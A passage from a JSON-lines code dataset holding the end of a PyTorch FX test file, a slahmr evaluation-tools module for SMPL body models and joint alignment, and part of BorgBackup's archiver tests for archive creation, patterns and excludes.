def forward(self, a, b):\n c, d = a\n return c + d + b\n\n a = (torch.rand(1), torch.rand(1))\n b = torch.rand(1)\n m = M()\n self.checkGraphModule(m, (a, b))\n\n @skipIfRocm\n def test_native_callable(self):\n # This test exercises the case where we use FX to translate from Python\n # code to some native callable object\n #\n # For the purposes of testing, we use ElementwiseInterpreter defined\n # in test_custom_class.cpp.\n #\n # We test that we can\n # 1) Construct a native callable from FX IR\n # 2) Construct a drop-in replacement module that delegates to the\n # native callable rather than the original code\n # 3) Run both the original code and native callable wrapper with\n # equivalent results\n # 4) TorchScript compile the native callable wrapper and confirm\n # equivalent results with the reference\n # 5) TorchScript serialize and deserialize the native callable\n # and confirm equivalent results with the reference\n\n # We use this simple Module as a reference computation\n class MySimpleMod(torch.nn.Module):\n def forward(self, x):\n return 3.0 * x + x\n\n msm = MySimpleMod()\n\n # This is what a lowering pass might look like: a function that takes\n # a valid nn.Module, symbolically traces it, lowers the Module to some\n # representation, and wraps that representation up into another\n # nn.Module instance that handles dispatch to the compiled/lowered code.\n def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:\n # ===== Stage 1: Symbolic trace the module =====\n mod = symbolic_trace(orig_mod)\n\n # ===== Stage 2: Lower GraphModule representation to the C++\n # interpreter's instruction format ======\n instructions = []\n constant_idx = 0\n constants = {}\n fn_input_names = []\n\n target_to_name = {\n operator.add : \"add\",\n operator.mul : \"mul\"\n }\n\n # For each instruction, create a triple\n # (instruction_name : str, inputs : List[str], output : str)\n # to feed into the C++ interpreter\n for n in mod.graph.nodes:\n target, args, out_name = n.target, n.args, n.name\n assert len(n.kwargs) == 0, \"kwargs currently not supported\"\n\n if n.op == 'placeholder':\n # Placeholders specify function argument names. Save these\n # for later when we generate the wrapper GraphModule\n fn_input_names.append(target)\n elif n.op == 'call_function':\n assert target in target_to_name, \"Unsupported call target \" + target\n arg_names = []\n for arg in args:\n if not isinstance(arg, Node):\n # Pull out constants. These constants will later be\n # fed to the interpreter C++ object via add_constant()\n arg_name = f'constant_{constant_idx}'\n constants[arg_name] = torch.Tensor(\n [arg] if isinstance(arg, numbers.Number) else arg)\n arg_names.append(arg_name)\n constant_idx += 1\n else:\n arg_names.append(arg.name)\n instructions.append((target_to_name[target], arg_names, out_name))\n\n else:\n raise RuntimeError('Unsupported opcode' + n.op)\n\n interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()\n # Load constants\n for k, v in constants.items():\n interpreter.add_constant(k, v)\n # Specify names for positional input arguments\n interpreter.set_input_names(fn_input_names)\n # Load instructions\n interpreter.set_instructions(instructions)\n # Specify name for single output\n interpreter.set_output_name(mod.graph.result.name)\n\n # ===== Stage 3: Create a wrapper GraphModule around the interpreter =====\n class WrapperModule(torch.nn.Module):\n def __init__(self, interpreter):\n super().__init__()\n self.interpreter = interpreter\n\n wrapper = WrapperModule(interpreter)\n\n # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter\n # 3) Returns the speficied return value\n\n # FIXME: The following code could be greatly simplified by symbolic_trace'ing\n # the wrapper with a Delegate that considers the Wrapper instance a root\n # module, however, I can't get `__call__` exposed on TorchBind classes\n # without it messing up Python `hasattr` for some reason. More digging\n # into CPython's implementation of hasattr is probably in order...\n\n graph = torch.fx.Graph()\n # Add placeholders for fn inputs\n placeholder_nodes = []\n for name in fn_input_names:\n placeholder_nodes.append(graph.create_node('placeholder', name))\n\n # Get the interpreter object\n interpreter_node = graph.create_node('get_param', 'interpreter')\n\n # Add a node to call the interpreter instance\n output_node = graph.create_node(\n op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))\n\n # Register output\n graph.output(output_node)\n\n # Return final GraphModule!!!\n return GraphModule(wrapper, graph)\n\n\n # Lower GraphModule to C++ interpreter\n lowered = lower_to_elementwise_interpreter(msm)\n\n # Compare correctness with original module\n x = torch.rand(3, 4)\n ref_out = msm(x)\n test_out = lowered(x)\n torch.testing.assert_allclose(test_out, ref_out)\n\n # Test TorchScript compilation\n scripted_lowered = torch.jit.script(lowered)\n script_out = scripted_lowered(x)\n torch.testing.assert_allclose(script_out, ref_out)\n\n # Test TorchScript ser/de\n import_copy = self.getExportImportCopy(scripted_lowered)\n imported_out = import_copy(x)\n torch.testing.assert_allclose(imported_out, ref_out)\n\n def test_reserved_getattr(self):\n \"\"\"Ensure that we do not name any nodes with a reserved builtin like `getattr`\"\"\"\n class M(torch.nn.Module):\n def forward(self, a):\n return a.foo.bar.baz\n\n m = M()\n m_g = symbolic_trace(m)\n for node in m_g.graph.nodes:\n self.assertTrue(node.name != \"getattr\")\n\n def test_node_tagging(self):\n class TaggingDelegate(DefaultDelegate):\n def create_node(self, kind : str, target : Union[str, Callable],\n args : Tuple[Any], kwargs : Dict[str, Any], name : Optional[str] = None) -> Node:\n n = super().create_node(kind, target, args, kwargs, name)\n n.tag = 'foo'\n return n\n\n class M(torch.nn.Module):\n def forward(self, a, b):\n return a + b\n\n m = M()\n g = symbolic_trace(m, TaggingDelegate).graph\n for n in g.nodes:\n self.assertTrue(hasattr(n, 'tag'))\n self.assertEqual(n.tag, 'foo')\n\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"stonne-simulator/stonne","sub_path":"pytorch-frontend/test/test_fx.py","file_name":"test_fx.py","file_ext":"py","file_size_in_byte":14380,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"81"} +{"seq_id":"34646104572","text":"import os\nimport sys\nimport glob\nimport json\nimport joblib\nimport numpy as np\nimport smplx\nimport torch\n\nfrom util.loaders import load_smpl_body_model\nfrom util.tensor import move_to, detach_all, to_torch\nfrom optim.output import load_result, get_results_paths\nfrom geometry.pcl import align_pcl\nfrom geometry.rotation import batch_rodrigues\n\nBASE_DIR = os.path.abspath(f\"{__file__}/../../../\")\nJOINT_REG_PATH = f\"{BASE_DIR}/_DATA/body_models/J_regressor_h36m.npy\"\n\n\n# XXX: Sorry, need to change this yourself\nEGOBODY_ROOT = \"/path/to/egobody\"\nTDPW_ROOT = \"/path/to/3DPW\"\n\n\nclass JointRegressor(object):\n def __init__(self):\n # (17, 6890)\n R17 = torch.from_numpy(np.load(JOINT_REG_PATH).astype(np.float32))\n # (14,) adding the root, but will omit\n joint_map_h36m = torch.tensor([6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10])\n self.regressor = R17[joint_map_h36m] # (14, 6890)\n\n def to(self, device):\n self.regressor = self.regressor.to(device)\n\n def __call__(self, verts):\n \"\"\"\n NOTE: RETURNS ROOT AS WELL\n :param verts (*, V, 3)\n returns (*, J, 3) 14 standard evaluation joints\n \"\"\"\n return torch.einsum(\"nv,...vd->...nd\", self.regressor, verts) # (..., 14, 3)\n\n\ndef compute_accel_norm(joints):\n \"\"\"\n :param joints (T, J, 3)\n \"\"\"\n vel = joints[1:] - joints[:-1] # (T-1, J, 3)\n acc = vel[1:] - vel[:-1] # (T-2, J, 3)\n return torch.linalg.norm(acc, dim=-1)\n\n\ndef global_align_joints(gt_joints, pred_joints):\n \"\"\"\n :param gt_joints (T, J, 3)\n :param pred_joints (T, J, 3)\n \"\"\"\n s_glob, R_glob, t_glob = align_pcl(\n gt_joints.reshape(-1, 3), pred_joints.reshape(-1, 3)\n )\n pred_glob = (\n s_glob * torch.einsum(\"ij,tnj->tni\", R_glob, pred_joints) + t_glob[None, None]\n )\n return pred_glob\n\n\ndef first_align_joints(gt_joints, pred_joints):\n \"\"\"\n align the first two frames\n :param gt_joints (T, J, 3)\n :param pred_joints (T, J, 3)\n \"\"\"\n # (1, 1), (1, 3, 3), (1, 3)\n s_first, R_first, t_first = align_pcl(\n gt_joints[:2].reshape(1, -1, 3), pred_joints[:2].reshape(1, -1, 3)\n )\n pred_first = (\n s_first * torch.einsum(\"tij,tnj->tni\", R_first, pred_joints) + t_first[:, None]\n )\n return pred_first\n\n\ndef local_align_joints(gt_joints, pred_joints):\n \"\"\"\n :param gt_joints (T, J, 3)\n :param pred_joints (T, J, 3)\n \"\"\"\n s_loc, R_loc, t_loc = align_pcl(gt_joints, pred_joints)\n pred_loc = (\n s_loc[:, None] * torch.einsum(\"tij,tnj->tni\", R_loc, pred_joints)\n + t_loc[:, None]\n )\n return pred_loc\n\n\ndef load_body_model(batch_size, model_type, gender, device):\n assert model_type in [\"smpl\", \"smplh\"]\n if model_type == \"smpl\":\n num_betas = 10\n ext = \"pkl\"\n use_vtx_selector = False\n else:\n num_betas = 16\n ext = \"npz\"\n use_vtx_selector = True\n\n smpl_path = f\"{BASE_DIR}/body_models/{model_type}/{gender}/model.{ext}\"\n body_model, fit_gender = load_smpl_body_model(\n smpl_path,\n batch_size,\n num_betas,\n model_type=model_type,\n use_vtx_selector=use_vtx_selector,\n device=device,\n )\n return body_model\n\n\ndef run_smpl(body_model, *args, **kwargs):\n with torch.no_grad():\n results = body_model(*args, **kwargs)\n return {\n \"joints\": results.Jtr.detach().cpu(),\n \"vertices\": results.v.detach().cpu(),\n \"faces\": results.f.detach().cpu(),\n }\n\n\ndef run_smpl_batch(body_model, device, **kwargs):\n model_kwargs = {}\n B = body_model.bm.batch_size\n kwarg_shape = (B,)\n for k, v in kwargs.items():\n kwarg_shape = v.shape[:-1]\n model_kwargs[k] = v.reshape(B, v.shape[-1]).to(device)\n res_flat = run_smpl(body_model, **model_kwargs)\n res = {}\n for k, v in res_flat.items():\n sh = v.shape\n if sh[0] == B:\n v = v.reshape(*kwarg_shape, *sh[1:])\n res[k] = v\n return res\n\n\ndef cat_dicts(dict_list, dim=0):\n \"\"\"\n concatenate lists of dict of tensors\n \"\"\"\n keys = set(dict_list[0].keys())\n assert all(keys == set(d.keys()) for d in dict_list)\n return {k: torch.stack([d[k] for d in dict_list], dim=dim) for k in keys}\n\n\ndef load_results_all(phase_dir, device):\n \"\"\"\n Load all the reconstructed tracks during optimization\n \"\"\"\n res_path_dict = get_results_paths(phase_dir)\n max_iter = max(res_path_dict.keys())\n if int(max_iter) < 20:\n print(\"max_iter\", max_iter)\n return None\n\n res = load_result(res_path_dict[max_iter])[\"world\"]\n # results is dict with (B, T, *) tensors\n trans = res[\"trans\"]\n B, T, _ = trans.shape\n root_orient = res[\"root_orient\"]\n pose_body = res[\"pose_body\"]\n betas = res[\"betas\"].reshape(B, 1, -1).expand(B, T, -1)\n body_model = load_body_model(B * T, \"smplh\", \"neutral\", device)\n return run_smpl_batch(\n body_model,\n device,\n trans=trans,\n root_orient=root_orient,\n betas=betas,\n pose_body=pose_body,\n )\n","repo_name":"vye16/slahmr","sub_path":"slahmr/eval/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":368,"dataset":"github-code","pt":"81"} +{"seq_id":"12452030927","text":"import errno\nimport json\nimport os\nfrom random import randbytes\nimport shutil\nimport socket\nimport stat\nimport time\nimport unittest\n\nimport pytest\n\nfrom ... import platform\nfrom ...constants import * # NOQA\nfrom ...manifest import Manifest\nfrom ...repository import Repository\nfrom .. import has_lchflags\nfrom .. import changedir\nfrom .. import (\n are_symlinks_supported,\n are_hardlinks_supported,\n are_fifos_supported,\n is_utime_fully_supported,\n is_birthtime_fully_supported,\n)\nfrom . import (\n ArchiverTestCaseBase,\n ArchiverTestCaseBinaryBase,\n RemoteArchiverTestCaseBase,\n RK_ENCRYPTION,\n BORG_EXES,\n requires_hardlinks,\n)\n\n\nclass ArchiverTestCase(ArchiverTestCaseBase):\n def test_basic_functionality(self):\n have_root = self.create_test_files()\n # fork required to test show-rc output\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION, \"--show-version\", \"--show-rc\", fork=True\n )\n self.assert_in(\"borgbackup version\", output)\n self.assert_in(\"terminating with success status, rc 0\", output)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--exclude-nodump\", \"test\", \"input\")\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--exclude-nodump\", \"--stats\", \"test.2\", \"input\"\n )\n self.assert_in(\"Archive name: test.2\", output)\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n list_output = self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--short\")\n self.assert_in(\"test\", list_output)\n self.assert_in(\"test.2\", list_output)\n expected = [\n \"input\",\n \"input/bdev\",\n \"input/cdev\",\n \"input/dir2\",\n \"input/dir2/file2\",\n \"input/empty\",\n \"input/file1\",\n \"input/flagfile\",\n ]\n if are_fifos_supported():\n expected.append(\"input/fifo1\")\n if are_symlinks_supported():\n expected.append(\"input/link1\")\n if are_hardlinks_supported():\n expected.append(\"input/hardlink\")\n if not have_root:\n # we could not create these device files without (fake)root\n expected.remove(\"input/bdev\")\n expected.remove(\"input/cdev\")\n if has_lchflags:\n # remove the file we did not backup, so input and output become equal\n expected.remove(\"input/flagfile\") # this file is UF_NODUMP\n os.remove(os.path.join(\"input\", \"flagfile\"))\n list_output = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--short\")\n for name in expected:\n self.assert_in(name, list_output)\n self.assert_dirs_equal(\"input\", \"output/input\")\n info_output = self.cmd(f\"--repo={self.repository_location}\", \"info\", \"-a\", \"test\")\n item_count = 5 if has_lchflags else 6 # one file is UF_NODUMP\n self.assert_in(\"Number of files: %d\" % item_count, info_output)\n shutil.rmtree(self.cache_path)\n info_output2 = self.cmd(f\"--repo={self.repository_location}\", \"info\", \"-a\", \"test\")\n\n def filter(output):\n # filter for interesting \"info\" output, ignore cache rebuilding related stuff\n prefixes = [\"Name:\", \"Fingerprint:\", \"Number of files:\", \"This archive:\", \"All archives:\", \"Chunk index:\"]\n result = []\n for line in output.splitlines():\n for prefix in prefixes:\n if line.startswith(prefix):\n result.append(line)\n return \"\\n\".join(result)\n\n # the interesting parts of info_output2 and info_output should be same\n self.assert_equal(filter(info_output), filter(info_output2))\n\n @requires_hardlinks\n def test_create_duplicate_root(self):\n # setup for #5603\n path_a = os.path.join(self.input_path, \"a\")\n path_b = os.path.join(self.input_path, \"b\")\n os.mkdir(path_a)\n os.mkdir(path_b)\n hl_a = os.path.join(path_a, \"hardlink\")\n hl_b = os.path.join(path_b, \"hardlink\")\n self.create_regular_file(hl_a, contents=b\"123456\")\n os.link(hl_a, hl_b)\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", \"--encryption=none\")\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"input\") # give input twice!\n # test if created archive has 'input' contents twice:\n archive_list = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\")\n paths = [json.loads(line)[\"path\"] for line in archive_list.split(\"\\n\") if line]\n # we have all fs items exactly once!\n assert sorted(paths) == [\"input\", \"input/a\", \"input/a/hardlink\", \"input/b\", \"input/b/hardlink\"]\n\n def test_unix_socket(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n try:\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n sock.bind(os.path.join(self.input_path, \"unix-socket\"))\n except PermissionError as err:\n if err.errno == errno.EPERM:\n pytest.skip(\"unix sockets disabled or not supported\")\n elif err.errno == errno.EACCES:\n pytest.skip(\"permission denied to create unix sockets\")\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\")\n sock.close()\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n assert not os.path.exists(\"input/unix-socket\")\n\n @pytest.mark.skipif(not is_utime_fully_supported(), reason=\"cannot properly setup and execute test without utime\")\n @pytest.mark.skipif(\n not is_birthtime_fully_supported(), reason=\"cannot properly setup and execute test without birthtime\"\n )\n def test_nobirthtime(self):\n self.create_test_files()\n birthtime, mtime, atime = 946598400, 946684800, 946771200\n os.utime(\"input/file1\", (atime, birthtime))\n os.utime(\"input/file1\", (atime, mtime))\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"--nobirthtime\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n sti = os.stat(\"input/file1\")\n sto = os.stat(\"output/input/file1\")\n assert int(sti.st_birthtime * 1e9) == birthtime * 1e9\n assert int(sto.st_birthtime * 1e9) == mtime * 1e9\n assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9\n\n def test_create_stdin(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n input_data = b\"\\x00foo\\n\\nbar\\n \\n\"\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"-\", input=input_data)\n item = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\"))\n assert item[\"uid\"] == 0\n assert item[\"gid\"] == 0\n assert item[\"size\"] == len(input_data)\n assert item[\"path\"] == \"stdin\"\n extracted_data = self.cmd(\n f\"--repo={self.repository_location}\", \"extract\", \"test\", \"--stdout\", binary_output=True\n )\n assert extracted_data == input_data\n\n def test_create_content_from_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n input_data = \"some test content\"\n name = \"a/b/c\"\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--stdin-name\",\n name,\n \"--content-from-command\",\n \"test\",\n \"--\",\n \"echo\",\n input_data,\n )\n item = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\"))\n assert item[\"uid\"] == 0\n assert item[\"gid\"] == 0\n assert item[\"size\"] == len(input_data) + 1 # `echo` adds newline\n assert item[\"path\"] == name\n extracted_data = self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\", \"--stdout\")\n assert extracted_data == input_data + \"\\n\"\n\n def test_create_content_from_command_with_failed_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--content-from-command\",\n \"test\",\n \"--\",\n \"sh\",\n \"-c\",\n \"exit 73;\",\n exit_code=2,\n )\n assert output.endswith(\"Command 'sh' exited with status 73\\n\")\n archive_list = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--json\"))\n assert archive_list[\"archives\"] == []\n\n def test_create_content_from_command_missing_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"--content-from-command\", exit_code=2)\n assert output.endswith(\"No command given.\\n\")\n\n def test_create_paths_from_stdin(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"dir1/file2\", size=1024 * 80)\n self.create_regular_file(\"dir1/file3\", size=1024 * 80)\n self.create_regular_file(\"file4\", size=1024 * 80)\n\n input_data = b\"input/file1\\0input/dir1\\0input/file4\"\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test\",\n \"--paths-from-stdin\",\n \"--paths-delimiter\",\n \"\\\\0\",\n input=input_data,\n )\n archive_list = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\")\n paths = [json.loads(line)[\"path\"] for line in archive_list.split(\"\\n\") if line]\n assert paths == [\"input/file1\", \"input/dir1\", \"input/file4\"]\n\n def test_create_paths_from_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.create_regular_file(\"file3\", size=1024 * 80)\n self.create_regular_file(\"file4\", size=1024 * 80)\n\n input_data = \"input/file1\\ninput/file2\\ninput/file3\"\n self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--paths-from-command\", \"test\", \"--\", \"echo\", input_data\n )\n archive_list = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--json-lines\")\n paths = [json.loads(line)[\"path\"] for line in archive_list.split(\"\\n\") if line]\n assert paths == [\"input/file1\", \"input/file2\", \"input/file3\"]\n\n def test_create_paths_from_command_with_failed_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--paths-from-command\",\n \"test\",\n \"--\",\n \"sh\",\n \"-c\",\n \"exit 73;\",\n exit_code=2,\n )\n assert output.endswith(\"Command 'sh' exited with status 73\\n\")\n archive_list = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--json\"))\n assert archive_list[\"archives\"] == []\n\n def test_create_paths_from_command_missing_command(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"--paths-from-command\", exit_code=2)\n assert output.endswith(\"No command given.\\n\")\n\n def test_create_without_root(self):\n \"\"\"test create without a root\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", exit_code=2)\n\n def test_create_pattern_root(self):\n \"\"\"test create with only a root pattern\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n output = self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"-v\", \"--list\", \"--pattern=R input\")\n self.assert_in(\"A input/file1\", output)\n self.assert_in(\"A input/file2\", output)\n\n def test_create_pattern(self):\n \"\"\"test file patterns during create\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.create_regular_file(\"file_important\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--pattern=+input/file_important\",\n \"--pattern=-input/file*\",\n \"test\",\n \"input\",\n )\n self.assert_in(\"A input/file_important\", output)\n self.assert_in(\"x input/file1\", output)\n self.assert_in(\"x input/file2\", output)\n\n def test_create_pattern_file(self):\n \"\"\"test file patterns during create\"\"\"\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n self.create_regular_file(\"otherfile\", size=1024 * 80)\n self.create_regular_file(\"file_important\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--pattern=-input/otherfile\",\n \"--patterns-from=\" + self.patterns_file_path,\n \"test\",\n \"input\",\n )\n self.assert_in(\"A input/file_important\", output)\n self.assert_in(\"x input/file1\", output)\n self.assert_in(\"x input/file2\", output)\n self.assert_in(\"x input/otherfile\", output)\n\n def test_create_pattern_exclude_folder_but_recurse(self):\n \"\"\"test when patterns exclude a parent folder, but include a child\"\"\"\n self.patterns_file_path2 = os.path.join(self.tmpdir, \"patterns2\")\n with open(self.patterns_file_path2, \"wb\") as fd:\n fd.write(b\"+ input/x/b\\n- input/x*\\n\")\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"x/a/foo_a\", size=1024 * 80)\n self.create_regular_file(\"x/b/foo_b\", size=1024 * 80)\n self.create_regular_file(\"y/foo_y\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--patterns-from=\" + self.patterns_file_path2,\n \"test\",\n \"input\",\n )\n self.assert_in(\"x input/x/a/foo_a\", output)\n self.assert_in(\"A input/x/b/foo_b\", output)\n self.assert_in(\"A input/y/foo_y\", output)\n\n def test_create_pattern_exclude_folder_no_recurse(self):\n \"\"\"test when patterns exclude a parent folder and, but include a child\"\"\"\n self.patterns_file_path2 = os.path.join(self.tmpdir, \"patterns2\")\n with open(self.patterns_file_path2, \"wb\") as fd:\n fd.write(b\"+ input/x/b\\n! input/x*\\n\")\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"x/a/foo_a\", size=1024 * 80)\n self.create_regular_file(\"x/b/foo_b\", size=1024 * 80)\n self.create_regular_file(\"y/foo_y\", size=1024 * 80)\n output = self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"-v\",\n \"--list\",\n \"--patterns-from=\" + self.patterns_file_path2,\n \"test\",\n \"input\",\n )\n self.assert_not_in(\"input/x/a/foo_a\", output)\n self.assert_not_in(\"input/x/a\", output)\n self.assert_in(\"A input/y/foo_y\", output)\n\n def test_create_pattern_intermediate_folders_first(self):\n \"\"\"test that intermediate folders appear first when patterns exclude a parent folder but include a child\"\"\"\n self.patterns_file_path2 = os.path.join(self.tmpdir, \"patterns2\")\n with open(self.patterns_file_path2, \"wb\") as fd:\n fd.write(b\"+ input/x/a\\n+ input/x/b\\n- input/x*\\n\")\n\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n\n self.create_regular_file(\"x/a/foo_a\", size=1024 * 80)\n self.create_regular_file(\"x/b/foo_b\", size=1024 * 80)\n with changedir(\"input\"):\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"--patterns-from=\" + self.patterns_file_path2,\n \"test\",\n \".\",\n )\n\n # list the archive and verify that the \"intermediate\" folders appear before\n # their contents\n out = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--format\", \"{type} {path}{NL}\")\n out_list = out.splitlines()\n\n self.assert_in(\"d x/a\", out_list)\n self.assert_in(\"d x/b\", out_list)\n\n assert out_list.index(\"d x/a\") < out_list.index(\"- x/a/foo_a\")\n assert out_list.index(\"d x/b\") < out_list.index(\"- x/b/foo_b\")\n\n def test_create_no_cache_sync(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.cmd(f\"--repo={self.repository_location}\", \"rdelete\", \"--cache-only\")\n create_json = json.loads(\n self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--no-cache-sync\", \"--json\", \"--error\", \"test\", \"input\"\n )\n ) # ignore experimental warning\n info_json = json.loads(self.cmd(f\"--repo={self.repository_location}\", \"info\", \"-a\", \"test\", \"--json\"))\n create_stats = create_json[\"cache\"][\"stats\"]\n info_stats = info_json[\"cache\"][\"stats\"]\n assert create_stats == info_stats\n self.cmd(f\"--repo={self.repository_location}\", \"rdelete\", \"--cache-only\")\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--no-cache-sync\", \"test2\", \"input\")\n self.cmd(f\"--repo={self.repository_location}\", \"rinfo\")\n self.cmd(f\"--repo={self.repository_location}\", \"check\")\n\n def test_create_archivename_with_placeholder(self):\n self.create_test_files()\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n ts = \"1999-12-31T23:59:59\"\n name_given = \"test-{now}\" # placeholder in archive name gets replaced by borg\n name_expected = f\"test-{ts}\" # placeholder in f-string gets replaced by python\n self.cmd(f\"--repo={self.repository_location}\", \"create\", f\"--timestamp={ts}\", name_given, \"input\")\n list_output = self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--short\")\n assert name_expected in list_output\n\n def test_exclude_caches(self):\n self._create_test_caches()\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"input\", \"--exclude-caches\")\n self._assert_test_caches()\n\n def test_exclude_tagged(self):\n self._create_test_tagged()\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test\",\n \"input\",\n \"--exclude-if-present\",\n \".NOBACKUP\",\n \"--exclude-if-present\",\n \"00-NOBACKUP\",\n )\n self._assert_test_tagged()\n\n def test_exclude_keep_tagged(self):\n self._create_test_keep_tagged()\n self.cmd(\n f\"--repo={self.repository_location}\",\n \"create\",\n \"test\",\n \"input\",\n \"--exclude-if-present\",\n \".NOBACKUP1\",\n \"--exclude-if-present\",\n \".NOBACKUP2\",\n \"--exclude-caches\",\n \"--keep-exclude-tags\",\n )\n self._assert_test_keep_tagged()\n\n def test_path_normalization(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"dir1/dir2/file\", size=1024 * 80)\n with changedir(\"input/dir1/dir2\"):\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test\", \"../../../input/dir1/../dir1/dir2/..\")\n output = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\")\n self.assert_not_in(\"..\", output)\n self.assert_in(\" input/dir1/dir2/file\", output)\n\n def test_exclude_normalization(self):\n self.cmd(f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION)\n self.create_regular_file(\"file1\", size=1024 * 80)\n self.create_regular_file(\"file2\", size=1024 * 80)\n with changedir(\"input\"):\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test1\", \".\", \"--exclude=file1\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test1\")\n self.assert_equal(sorted(os.listdir(\"output\")), [\"file2\"])\n with changedir(\"input\"):\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"test2\", \".\", \"--exclude=./file1\")\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test2\")\n 